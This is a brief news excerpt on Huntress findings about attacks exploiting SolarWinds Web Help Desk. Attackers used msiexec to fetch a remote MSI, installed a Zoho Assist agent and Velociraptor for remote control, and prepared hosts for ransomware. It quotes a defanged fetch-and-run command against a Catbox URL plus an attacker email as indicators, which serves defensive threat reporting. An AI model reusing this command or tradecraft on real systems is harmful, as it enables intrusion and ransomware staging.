"Security researchers warn of active attacks on SolarWinds Web Help Desk. Malicious actors are exploiting vulnerabilities to infiltrate systems and then deploy forensic tools as command-and-control infrastructure. The attack chain ends with preparing systems for ransomware deployment. Huntress researchers observed attacks originating from a compromised SolarWinds Web Help Desk instance last week. The attack chain started with wrapper.exe, the WHD service wrapper, which launched java.exe. The Java process then launched cmd.exe to silently install an external MSI payload via the command msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi."
"The attacker used Catbox to deploy a Zoho ManageEngine RMM agent. This legitimate remote management tool is often abused to gain access to compromised environments. The Zoho Assist agent was configured for unattended access, registering the compromised host with a Zoho Assist account linked to the Proton Mail address esmahyft@proton[.]me. Immediately after installing the RMM agent, the attacker began hands-on keyboard activity. Through the RMM agent process (TOOLSIQ.EXE), the attacker executed Active Directory discovery commands to inventory machines."
Active attacks targeted SolarWinds Web Help Desk, with compromise originating from a vulnerable WHD instance. The attack chain began when wrapper.exe launched java.exe, which spawned cmd.exe to silently install an external MSI via msiexec. The attackers deployed a Zoho ManageEngine RMM agent configured for unattended access and registered the host to a Proton Mail-linked Zoho Assist account. The intruders performed hands-on keyboard activity, executing Active Directory discovery through the RMM process. Velociraptor was then installed from an attacker-controlled Supabase bucket and used for remote command execution and process control. The campaign prepared systems for eventual ransomware deployment.
Read at Techzine Global
Unable to calculate read time
Collection
[
|
...
]